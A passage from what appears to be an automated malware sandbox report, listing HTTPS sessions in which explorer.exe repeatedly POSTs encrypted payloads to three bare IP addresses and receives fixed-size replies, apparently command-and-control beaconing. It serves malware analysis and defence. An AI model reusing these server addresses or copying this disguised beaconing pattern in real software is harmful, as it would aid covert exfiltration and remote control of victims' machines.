                                                                              2024-07-27 12:55:46 UTC1122OUTData Raw: 4e 6e 70 42 68 61 36 57 6b 6f 70 6b 6d 32 45 61 36 76 49 53 69 34 30 37 4f 35 54 5a 47 41 41 54 37 57 4e 71 33 4e 38 75 4f 56 49 32 6a 78 37 4d 32 74 42 43 34 6c 49 31 4c 2b 57 67 46 6f 43 7a 71 63 37 74 6d 7a 4a 4a 30 6a 67 4b 64 50 66 71 53 64 74 37 6f 4d 6a 31 70 32 4d 55 43 41 2f 69 6c 6e 56 74 56 78 70 33 34 75 58 62 33 41 2b 6a 73 41 79 64 6f 56 34 65 57 56 46 55 37 66 71 32 30 2f 77 52 5a 62 4d 73 65 32 79 79 4c 32 70 30 65 43 33 2b 61 54 30 41 4b 44 46 65 57 4f 72 4b 79 63 6c 4f 72 6b 6f 33 4a 35 6c 48 74 50 33 58 50 44 49 76 78 6b 47 6e 6d 76 33 2f 6b 55 48 37 69 74 4b 67 6e 43 47 66 41 36 73 4d 41 50 50 6a 61 67 53 71 32 49 4f 74 46 2f 34 31 31 4f 7a 79 4a 58 43 55 64 45 76 65 79 67 4f 58 4a 4a 55 6c 64 70 54 43 74 72 4c 70 75 50 34 2b 7a 35 62
                                                                              Data Ascii: NnpBha6Wkopkm2Ea6vISi407O5TZGAAT7WNq3N8uOVI2jx7M2tBC4lI1L+WgFoCzqc7tmzJJ0jgKdPfqSdt7oMj1p2MUCA/ilnVtVxp34uXb3A+jsAydoV4eWVFU7fq20/wRZbMse2yyL2p0eC3+aT0AKDFeWOrKyclOrko3J5lHtP3XPDIvxkGnmv3/kUH7itKgnCGfA6sMAPPjagSq2IOtF/411OzyJXCUdEveygOXJJUldpTCtrLpuP4+z5b
                                                                              2024-07-27 12:55:47 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:47 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:47 UTC685INData Raw: 73 6b 69 58 61 6d 6c 4a 72 79 73 2b 37 4c 78 56 4f 50 6a 6f 71 2b 77 64 7a 67 39 33 35 72 32 44 61 41 33 6a 64 37 33 37 58 4a 70 69 42 77 66 70 62 79 48 58 36 42 47 30 76 57 6e 66 70 43 47 63 64 7a 64 64 63 4d 4a 55 64 61 53 64 79 6e 48 4f 56 32 6a 74 4f 36 35 4d 51 6b 64 71 45 55 38 69 67 76 52 75 58 42 4e 2b 2b 4a 42 57 2f 2f 6e 47 79 46 50 4d 6c 68 71 56 41 6e 75 30 57 79 4c 34 34 62 61 34 37 73 67 35 6b 69 2f 61 68 70 62 34 34 52 59 2f 35 32 65 77 42 4b 4c 6d 67 2b 46 59 63 57 58 63 4b 64 47 65 33 79 6e 4d 61 6a 72 72 34 6a 55 67 32 6a 6c 53 44 4b 64 42 59 75 36 53 61 52 62 47 72 59 49 68 42 63 4d 4d 65 66 77 70 62 54 56 71 43 33 46 4a 4d 48 31 77 32 4f 42 75 75 4a 6a 45 35 63 6b 62 41 7a 4b 70 4b 5a 73 32 50 6c 32 39 69 53 31 6b 32 53 54 66 6e 78 32
                                                                              Data Ascii: skiXamlJrys+7LxVOPjoq+wdzg935r2DaA3jd737XJpiBwfpbyHX6BG0vWnfpCGcdzddcMJUdaSdynHOV2jtO65MQkdqEU8igvRuXBN++JBW//nGyFPMlhqVAnu0WyL44ba47sg5ki/ahpb44RY/52ewBKLmg+FYcWXcKdGe3ynMajrr4jUg2jlSDKdBYu6SaRbGrYIhBcMMefwpbTVqC3FJMH1w2OBuuJjE5ckbAzKpKZs2Pl29iS1k2STfnx2


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              90192.168.2.449871107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:48 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:48 UTC1267OUTData Raw: 62 65 5a 69 43 43 37 36 57 63 41 35 6a 63 7a 61 32 31 44 63 58 6c 4a 77 50 52 48 38 71 51 34 44 49 6f 42 52 71 46 77 4e 48 6a 2b 75 45 76 70 4e 41 74 68 78 65 42 33 37 72 56 7a 71 36 57 51 37 35 4c 79 2f 4c 59 55 57 51 78 78 53 39 66 55 42 45 72 77 55 78 64 6f 66 33 42 6d 6f 37 6b 6e 4d 32 6b 54 6f 64 42 5a 41 45 2f 37 44 39 7a 4a 36 59 79 35 37 51 44 51 6f 58 48 46 32 4d 49 77 49 31 61 55 69 48 7a 38 74 35 48 2f 2b 52 66 75 33 44 57 34 4a 35 6e 45 4a 43 46 45 65 37 64 4d 45 32 79 57 7a 49 73 39 78 61 4f 78 73 6e 67 64 65 66 30 38 74 42 4d 48 52 65 71 5a 76 5a 70 78 64 69 62 69 77 36 59 62 61 6b 63 7a 66 74 62 70 32 6a 50 41 30 4b 57 34 68 45 55 77 46 6e 53 34 39 53 30 53 79 56 6f 6a 71 68 32 51 64 51 57 7a 49 6e 72 31 74 4e 71 67 66 4c 56 6b 44 71 6d 64
                                                                              Data Ascii: beZiCC76WcA5jcza21DcXlJwPRH8qQ4DIoBRqFwNHj+uEvpNAthxeB37rVzq6WQ75Ly/LYUWQxxS9fUBErwUxdof3Bmo7knM2kTodBZAE/7D9zJ6Yy57QDQoXHF2MIwI1aUiHz8t5H/+Rfu3DW4J5nEJCFEe7dME2yWzIs9xaOxsngdef08tBMHReqZvZpxdibiw6Ybakczftbp2jPA0KW4hEUwFnS49S0SyVojqh2QdQWzInr1tNqgfLVkDqmd
                                                                              2024-07-27 12:55:49 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:49 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:49 UTC685INData Raw: 78 39 47 6d 31 79 50 51 64 6e 58 32 65 4b 44 6e 57 77 30 48 32 78 61 6a 51 53 64 69 2f 4c 4f 67 75 62 4b 66 61 2f 54 63 6d 31 6c 78 70 50 65 4a 33 41 68 4c 50 4f 6d 55 6b 57 67 6e 6a 6f 71 52 2f 71 44 4a 6a 69 41 4a 44 34 45 2b 65 65 30 73 53 4c 42 55 67 36 35 55 6e 65 77 77 6d 4c 6e 43 74 37 4f 57 46 4d 70 76 47 62 4e 51 38 47 48 2f 6b 2b 34 71 57 4a 75 62 72 6b 47 70 4b 56 51 45 63 55 33 4b 57 35 4e 44 4c 66 43 67 78 48 4f 59 43 6a 2b 51 6c 79 54 2f 7a 78 63 6a 59 6a 76 47 68 49 73 39 43 33 49 4c 70 56 75 78 4e 30 47 6c 6c 31 74 2b 4f 77 46 73 4f 63 79 33 4b 72 79 42 4f 62 51 6a 57 66 63 5a 6e 73 64 45 74 2b 46 36 6a 6e 68 4b 59 6d 7a 33 78 6e 55 52 33 7a 6a 76 62 71 43 41 74 6a 6d 37 32 49 32 4a 4b 39 61 36 6f 53 4a 73 39 54 2b 71 5a 51 46 34 61 41 73
                                                                              Data Ascii: x9Gm1yPQdnX2eKDnWw0H2xajQSdi/LOgubKfa/Tcm1lxpPeJ3AhLPOmUkWgnjoqR/qDJjiAJD4E+ee0sSLBUg65UnewwmLnCt7OWFMpvGbNQ8GH/k+4qWJubrkGpKVQEcU3KW5NDLfCgxHOYCj+QlyT/zxcjYjvGhIs9C3ILpVuxN0Gll1t+OwFsOcy3KryBObQjWfcZnsdEt+F6jnhKYmz3xnUR3zjvbqCAtjm72I2JK9a6oSJs9T+qZQF4aAs


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              91192.168.2.449873167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:50 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:50 UTC1122OUTData Raw: 43 52 66 7a 6f 43 4f 66 42 71 75 31 48 70 49 45 4f 4f 46 46 5a 62 72 75 4c 36 31 33 6f 67 37 6c 64 46 58 33 45 6a 73 6b 73 78 4c 57 39 51 6d 31 35 7a 4d 4e 46 48 73 73 45 38 53 4b 79 54 6d 7a 59 4a 62 45 74 33 4b 72 71 42 6c 66 76 64 4e 72 69 6f 44 48 2f 61 7a 76 36 36 4c 4d 41 32 33 46 37 62 54 61 50 32 58 4e 5a 4f 69 4f 67 73 62 75 72 6e 6e 42 61 2b 71 75 38 63 69 65 53 69 51 4f 67 64 32 51 4e 76 67 59 74 74 6c 32 44 50 57 48 69 4f 69 72 30 6f 41 55 47 4b 4d 50 49 46 30 72 54 57 54 34 7a 78 4e 65 59 56 6b 49 74 79 51 36 7a 76 48 51 33 57 67 44 65 69 34 4f 6e 69 63 76 36 31 61 4b 65 33 4a 58 73 56 7a 2b 41 55 38 39 66 65 73 65 77 37 6a 69 6d 66 58 4e 38 71 58 6a 4e 32 4e 6c 4a 79 76 49 43 51 6d 34 31 7a 59 2f 4a 4d 32 4d 65 46 31 58 44 43 4c 46 5a 74 79
                                                                              Data Ascii: CRfzoCOfBqu1HpIEOOFFZbruL613og7ldFX3EjsksxLW9Qm15zMNFHssE8SKyTmzYJbEt3KrqBlfvdNrioDH/azv66LMA23F7bTaP2XNZOiOgsburnnBa+qu8cieSiQOgd2QNvgYttl2DPWHiOir0oAUGKMPIF0rTWT4zxNeYVkItyQ6zvHQ3WgDei4Onicv61aKe3JXsVz+AU89fesew7jimfXN8qXjN2NlJyvICQm41zY/JM2MeF1XDCLFZty
                                                                              2024-07-27 12:55:51 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:51 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:51 UTC685INData Raw: 53 41 78 6f 4d 48 68 61 61 76 6f 48 70 54 45 62 4a 78 5a 76 42 31 66 64 32 64 6d 4d 45 73 46 6c 31 32 65 53 31 55 32 59 62 43 57 38 33 66 75 77 72 5a 30 59 70 48 6a 62 63 4d 55 2b 73 51 5a 59 46 74 72 64 63 70 35 36 6b 78 61 67 4c 69 4b 79 64 49 6e 44 61 49 7a 45 30 36 51 6d 77 72 31 4a 58 44 74 6b 6a 43 44 41 61 47 30 67 39 53 79 4b 6d 4d 74 57 2b 42 34 68 2f 46 31 66 38 32 61 65 53 4a 4f 46 71 63 66 51 61 6f 74 56 58 77 48 55 50 57 76 74 61 6e 2b 73 4e 66 78 2b 61 42 6e 43 41 2b 6a 43 6a 68 63 33 43 75 79 69 4b 56 70 4e 6c 73 31 39 68 76 71 62 72 6a 75 32 6f 32 6d 71 59 71 62 6f 2b 65 44 2f 4a 68 34 62 70 75 36 56 49 73 51 31 32 6d 65 32 47 4d 5a 46 32 6b 49 51 45 5a 67 41 78 31 6f 6a 68 55 30 47 38 66 34 73 4d 4c 37 79 50 38 79 41 78 56 68 31 63 34 4e
                                                                              Data Ascii: SAxoMHhaavoHpTEbJxZvB1fd2dmMEsFl12eS1U2YbCW83fuwrZ0YpHjbcMU+sQZYFtrdcp56kxagLiKydInDaIzE06Qmwr1JXDtkjCDAaG0g9SyKmMtW+B4h/F1f82aeSJOFqcfQaotVXwHUPWvtan+sNfx+aBnCA+jCjhc3CuyiKVpNls19hvqbrju2o2mqYqbo+eD/Jh4bpu6VIsQ12me2GMZF2kIQEZgAx1ojhU0G8f4sML7yP8yAxVh1c4N


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              92192.168.2.449874107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:51 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:51 UTC1122OUTData Raw: 59 76 74 56 34 31 31 7a 6d 34 38 4e 62 66 2f 70 34 48 74 63 44 32 47 61 50 4f 76 75 33 68 31 47 73 70 44 56 33 78 57 61 6f 39 45 73 39 2f 6f 77 70 2b 49 36 4a 6e 43 4a 7a 47 6a 6b 49 46 47 33 4b 49 6c 62 51 4a 41 44 50 48 63 74 73 75 42 64 58 41 4e 44 4c 73 79 45 78 4d 37 68 41 4d 43 75 4f 67 66 65 4f 61 30 51 6c 57 59 74 44 4c 71 37 6b 45 6d 66 55 78 73 6f 64 42 67 64 48 2f 4f 57 2b 69 4c 37 2b 46 74 2b 67 4f 6d 4b 57 66 38 41 6e 31 39 6a 70 6e 57 74 42 7a 62 6b 65 4d 46 6a 49 30 38 6c 37 4b 42 65 68 6f 32 7a 6e 41 6b 49 67 42 70 61 4c 6f 2f 30 6d 71 43 6d 59 58 70 75 70 6a 34 30 51 67 75 4e 51 48 70 53 6d 51 79 74 4c 7a 61 57 66 46 51 64 71 31 52 5a 50 6c 65 69 66 54 6a 6d 46 54 4a 31 2f 34 45 72 4b 39 78 52 73 4d 43 65 35 39 71 34 39 6e 47 76 32 54 30
                                                                              Data Ascii: YvtV411zm48Nbf/p4HtcD2GaPOvu3h1GspDV3xWao9Es9/owp+I6JnCJzGjkIFG3KIlbQJADPHctsuBdXANDLsyExM7hAMCuOgfeOa0QlWYtDLq7kEmfUxsodBgdH/OW+iL7+Ft+gOmKWf8An19jpnWtBzbkeMFjI08l7KBeho2znAkIgBpaLo/0mqCmYXpupj40QguNQHpSmQytLzaWfFQdq1RZPleifTjmFTJ1/4ErK9xRsMCe59q49nGv2T0
                                                                              2024-07-27 12:55:53 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:53 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:53 UTC685INData Raw: 57 6f 76 65 53 72 44 63 73 32 32 30 4c 55 42 42 2f 66 68 79 6b 2f 58 73 50 79 55 31 62 78 70 49 64 68 56 31 7a 6c 49 4f 30 31 36 74 48 67 78 53 55 6a 73 2f 46 4f 43 70 2b 5a 51 4f 6e 50 4b 61 4e 79 6f 37 66 42 4a 42 52 76 79 4e 76 73 5a 56 69 76 37 2b 30 4d 47 4f 72 39 2f 65 65 53 41 51 32 48 44 43 31 36 33 55 44 45 5a 54 57 34 4c 70 33 4f 79 34 6a 32 30 39 41 6a 4e 46 66 34 62 78 72 5a 51 75 4a 34 68 43 30 67 70 30 36 53 70 53 36 76 36 6d 65 6b 57 6e 2f 58 4c 4f 46 4d 53 6d 63 76 47 6f 62 6f 46 2b 44 4d 2f 30 49 6b 44 39 58 66 5a 50 48 56 67 72 63 53 51 46 70 4d 63 55 64 52 2f 4b 35 46 7a 42 31 30 78 61 2b 72 72 75 74 46 4f 47 4f 6a 50 31 49 4e 48 49 6c 32 35 77 56 64 79 6c 75 63 66 70 53 5a 49 55 65 62 74 57 45 58 72 79 5a 65 44 39 48 4b 6e 51 38 4d 69
                                                                              Data Ascii: WoveSrDcs220LUBB/fhyk/XsPyU1bxpIdhV1zlIO016tHgxSUjs/FOCp+ZQOnPKaNyo7fBJBRvyNvsZViv7+0MGOr9/eeSAQ2HDC163UDEZTW4Lp3Oy4j209AjNFf4bxrZQuJ4hC0gp06SpS6v6mekWn/XLOFMSmcvGoboF+DM/0IkD9XfZPHVgrcSQFpMcUdR/K5FzB10xa+rrutFOGOjP1INHIl25wVdylucfpSZIUebtWEXryZeD9HKnQ8Mi


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              93192.168.2.449875107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:53 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
                                                                              2024-07-27 12:55:53 UTC1267OUTData Raw: 6d 77 72 53 2f 55 2f 5a 72 78 51 38 61 4d 71 65 75 44 6e 35 4b 66 63 78 46 32 36 4d 49 58 48 64 72 41 51 70 45 4e 4b 64 37 47 4a 34 33 48 61 74 59 51 38 51 54 59 5a 58 34 75 53 56 75 38 73 4b 74 79 6a 73 6a 51 5a 5a 66 53 65 6d 4f 44 52 44 5a 62 44 75 33 6a 79 73 78 70 51 74 6a 31 7a 4c 66 32 66 62 33 32 4b 6e 32 78 55 41 52 56 67 6b 74 33 57 44 39 67 45 69 59 74 61 31 32 56 43 45 50 48 4b 71 57 74 67 45 4d 5a 37 59 52 74 64 49 68 6b 78 4f 55 35 2f 46 48 42 4f 5a 49 52 4e 72 38 63 33 37 6d 39 41 48 77 55 79 31 74 57 4b 46 73 2b 2b 54 61 7a 32 6e 31 74 77 62 74 67 42 78 76 79 69 41 79 49 79 31 79 4c 68 49 62 35 56 45 63 6c 38 32 6d 6b 57 51 44 6d 4a 68 59 64 4e 46 68 6e 4a 6d 44 58 36 4a 56 69 59 74 78 33 50 51 54 53 70 76 4c 72 50 4e 53 4b 7a 72 58 4f 4a
                                                                              Data Ascii: mwrS/U/ZrxQ8aMqeuDn5KfcxF26MIXHdrAQpENKd7GJ43HatYQ8QTYZX4uSVu8sKtyjsjQZZfSemODRDZbDu3jysxpQtj1zLf2fb32Kn2xUARVgkt3WD9gEiYta12VCEPHKqWtgEMZ7YRtdIhkxOU5/FHBOZIRNr8c37m9AHwUy1tWKFs++Taz2n1twbtgBxvyiAyIy1yLhIb5VEcl82mkWQDmJhYdNFhnJmDX6JViYtx3PQTSpvLrPNSKzrXOJ
                                                                              2024-07-27 12:55:55 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:55 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:55 UTC685INData Raw: 43 30 7a 38 78 4c 57 43 43 46 71 55 55 4f 44 4a 7a 79 34 39 38 65 5a 64 73 54 66 63 4e 54 43 63 7a 37 4b 7a 33 54 44 6f 71 67 71 37 32 79 42 70 30 49 53 68 42 33 52 76 74 37 4b 31 4b 71 51 66 33 44 52 74 31 77 42 49 67 44 30 4e 32 49 35 53 51 57 4a 58 47 39 6d 42 68 58 45 4d 33 67 41 61 72 6c 47 50 45 52 42 6a 30 4a 32 55 68 69 66 6b 50 57 57 37 34 59 6c 72 5a 41 6c 35 66 78 33 38 62 32 41 70 57 58 7a 76 54 51 63 55 41 62 78 48 6a 73 42 47 6b 79 59 53 63 44 54 37 44 31 47 6c 30 62 70 6c 65 2f 4f 55 65 62 4c 33 63 6f 37 78 56 56 4a 2b 41 7a 63 5a 34 49 4e 78 50 4f 6c 6d 53 58 2f 6b 62 4c 6a 4b 79 32 66 61 43 76 75 4c 35 54 32 72 5a 78 70 43 55 53 54 52 62 6b 35 73 46 62 71 7a 4f 74 79 51 34 75 75 6b 5a 58 6e 59 44 6f 61 74 43 61 6a 44 4e 79 79 47 6d 6e 53
                                                                              Data Ascii: C0z8xLWCCFqUUODJzy498eZdsTfcNTCcz7Kz3TDoqgq72yBp0IShB3Rvt7K1KqQf3DRt1wBIgD0N2I5SQWJXG9mBhXEM3gAarlGPERBj0J2UhifkPWW74YlrZAl5fx38b2ApWXzvTQcUAbxHjsBGkyYScDT7D1Gl0bple/OUebL3co7xVVJ+AzcZ4INxPOlmSX/kbLjKy2faCvuL5T2rZxpCUSTRbk5sFbqzOtyQ4uukZXnYDoatCajDNyyGmnS


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              94192.168.2.449877167.235.128.1534432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:56 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 167.235.128.153
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:56 UTC1122OUTData Raw: 6a 34 6b 6d 63 41 54 76 49 36 61 30 47 6b 45 41 73 4e 63 46 46 33 6e 6a 36 37 52 52 64 46 45 74 53 6b 62 55 4d 39 4b 79 6c 41 34 35 52 4b 5a 6e 43 68 53 65 54 6f 73 51 39 69 68 53 56 62 31 73 48 6f 63 2f 76 44 6f 56 50 44 5a 30 30 74 36 75 4d 63 51 51 32 75 2f 56 4b 7a 46 77 49 70 56 36 43 68 34 6f 2b 56 59 49 58 31 4c 72 4a 5a 77 67 69 56 59 48 45 47 5a 50 38 30 4f 39 39 4e 4c 62 6a 48 41 61 47 2b 62 79 62 45 41 68 65 61 53 45 5a 30 78 59 53 2f 66 6c 74 50 64 52 6a 42 56 45 66 56 50 54 73 55 71 37 69 56 74 38 58 34 2b 49 2f 61 66 49 75 77 30 47 2b 70 4b 2b 36 41 4b 76 79 6b 36 34 41 66 78 6b 6e 57 57 65 6a 44 37 74 59 6b 43 67 71 76 67 58 32 44 37 51 5a 63 77 34 6b 73 35 6e 32 75 52 53 6e 44 2b 76 68 4f 53 49 73 4f 56 63 4e 71 2b 31 6d 70 34 74 71 54 4f
                                                                              Data Ascii: j4kmcATvI6a0GkEAsNcFF3nj67RRdFEtSkbUM9KylA45RKZnChSeTosQ9ihSVb1sHoc/vDoVPDZ00t6uMcQQ2u/VKzFwIpV6Ch4o+VYIX1LrJZwgiVYHEGZP80O99NLbjHAaG+bybEAheaSEZ0xYS/fltPdRjBVEfVPTsUq7iVt8X4+I/afIuw0G+pK+6AKvyk64AfxknWWejD7tYkCgqvgX2D7QZcw4ks5n2uRSnD+vhOSIsOVcNq+1mp4tqTO
                                                                              2024-07-27 12:55:57 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:56 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:57 UTC685INData Raw: 72 58 46 59 4b 35 32 46 41 77 4e 4f 31 65 6b 6a 37 2b 56 57 31 2b 32 33 49 38 54 58 74 65 75 71 71 57 32 68 2f 46 54 65 63 71 34 6c 2b 57 49 33 50 68 36 49 6f 67 38 6a 30 33 2b 6e 62 43 48 2b 2f 7a 73 6e 33 49 78 78 35 52 6c 78 66 6f 56 50 38 75 43 54 67 6b 6a 58 54 4b 4f 72 61 79 4f 4e 77 66 51 65 66 4f 4e 49 64 64 4b 4b 2f 54 65 54 77 71 53 55 36 74 5a 63 2b 61 79 39 79 75 59 4f 45 31 58 4b 52 42 47 4f 4a 39 49 33 61 58 30 37 73 36 59 31 57 4c 79 78 30 7a 6b 7a 49 4a 75 32 35 47 4c 30 53 38 45 49 74 72 37 6b 44 71 6b 65 43 35 6b 5a 35 41 2b 6e 78 62 49 45 56 4d 56 2b 6c 32 50 6b 6f 79 76 6d 59 78 30 77 42 4a 55 36 74 61 65 6b 76 4f 4a 6b 49 4e 33 31 6d 67 35 5a 6e 55 34 69 4f 61 30 59 41 7a 48 51 33 43 41 51 47 55 78 5a 6c 35 4a 6b 48 49 69 34 44 6c 64
                                                                              Data Ascii: rXFYK52FAwNO1ekj7+VW1+23I8TXteuqqW2h/FTecq4l+WI3Ph6Iog8j03+nbCH+/zsn3Ixx5RlxfoVP8uCTgkjXTKOrayONwfQefONIddKK/TeTwqSU6tZc+ay9yuYOE1XKRBGOJ9I3aX07s6Y1WLyx0zkzIJu25GL0S8EItr7kDqkeC5kZ5A+nxbIEVMV+l2PkoyvmYx0wBJU6taekvOJkIN31mg5ZnU4iOa0YAzHQ3CAQGUxZl5JkHIi4Dld


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              95192.168.2.449878107.173.160.1374432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:55:58 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.137
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1122
                                                                              2024-07-27 12:55:58 UTC1122OUTData Raw: 49 2b 37 37 36 36 46 70 35 32 4f 32 72 69 33 56 5a 4a 43 75 37 62 6b 32 66 56 30 2f 4f 50 35 48 42 32 6b 71 44 44 30 57 67 4e 61 35 68 75 5a 4c 77 55 66 53 57 68 6f 59 47 4d 63 54 64 36 77 46 61 70 49 71 47 6d 54 39 62 56 64 74 54 34 7a 51 54 74 48 69 6a 67 4c 70 46 76 34 31 33 57 34 67 56 41 45 58 31 2f 42 72 4b 76 51 66 73 4f 54 54 43 54 6c 77 72 44 72 67 44 55 34 54 64 6b 37 38 38 39 74 2f 59 45 48 6b 77 6b 64 43 2b 47 34 30 6c 33 72 46 6b 46 70 6c 45 30 69 52 46 4d 4e 47 53 51 66 69 6d 75 30 6b 50 37 6d 50 68 76 67 4a 32 75 55 67 37 37 56 55 51 38 34 5a 4c 43 77 61 46 33 63 63 45 7a 73 4e 42 57 48 34 58 54 61 4d 30 38 4d 57 59 30 5a 6b 69 45 6a 63 7a 73 50 55 52 6b 57 76 44 61 2f 38 6f 4e 71 53 6a 33 37 52 43 63 58 31 46 4c 47 59 6f 6e 6f 76 41 65 44
                                                                              Data Ascii: I+7766Fp52O2ri3VZJCu7bk2fV0/OP5HB2kqDD0WgNa5huZLwUfSWhoYGMcTd6wFapIqGmT9bVdtT4zQTtHijgLpFv413W4gVAEX1/BrKvQfsOTTCTlwrDrgDU4Tdk7889t/YEHkwkdC+G40l3rFkFplE0iRFMNGSQfimu0kP7mPhvgJ2uUg77VUQ84ZLCwaF3ccEzsNBWH4XTaM08MWY0ZkiEjczsPURkWvDa/8oNqSj37RCcX1FLGYonovAeD
                                                                              2024-07-27 12:55:59 UTC137INHTTP/1.1 200 OK
                                                                              Content-Length: 685
                                                                              Date: Sat, 27 Jul 2024 12:55:59 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Connection: close
                                                                              2024-07-27 12:55:59 UTC685INData Raw: 54 48 43 38 54 79 6f 6c 32 6e 72 49 74 77 6e 58 79 5a 59 6d 4d 41 73 66 67 59 4c 36 4a 63 62 30 30 4f 31 49 33 58 74 45 30 44 76 6e 6c 48 6e 73 71 6e 51 4e 4b 37 77 44 52 47 2b 6d 68 50 72 44 33 5a 43 49 4a 4c 61 35 59 66 48 72 53 38 66 70 74 2f 55 44 74 39 69 59 57 55 42 4c 2b 6a 77 4a 62 52 30 75 2b 61 2f 51 6e 6e 50 70 58 69 48 4c 69 47 39 42 42 47 63 55 64 6e 6e 2b 4b 45 45 57 4b 6d 70 4e 63 47 74 6a 2b 4e 4c 39 34 45 75 45 66 56 57 62 37 75 31 67 45 66 36 42 34 74 79 42 65 43 4d 69 2f 41 4f 68 75 36 55 4e 4e 59 65 47 58 6c 45 62 74 59 39 41 45 42 75 78 59 70 32 56 79 66 36 54 53 77 6e 4d 34 57 2b 66 72 75 61 72 75 2b 78 36 76 33 64 72 49 74 4f 6d 61 62 51 52 66 66 49 50 4f 67 53 4a 66 30 32 78 36 34 4f 43 4e 56 7a 30 6b 4f 63 74 72 31 6a 51 4e 58 6d
                                                                              Data Ascii: THC8Tyol2nrItwnXyZYmMAsfgYL6Jcb00O1I3XtE0DvnlHnsqnQNK7wDRG+mhPrD3ZCIJLa5YfHrS8fpt/UDt9iYWUBL+jwJbR0u+a/QnnPpXiHLiG9BBGcUdnn+KEEWKmpNcGtj+NL94EuEfVWb7u1gEf6B4tyBeCMi/AOhu6UNNYeGXlEbtY9AEBuxYp2Vyf6TSwnM4W+fruaru+x6v3drItOmabQRffIPOgSJf02x64OCNVz0kOctr1jQNXm


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              96192.168.2.449880107.173.160.1394432580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:56:00 UTC234OUTPOST / HTTP/1.1
                                                                              Host: 107.173.160.139
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Connection: close
                                                                              Content-Type: text/plain
                                                                              Content-Length: 1267
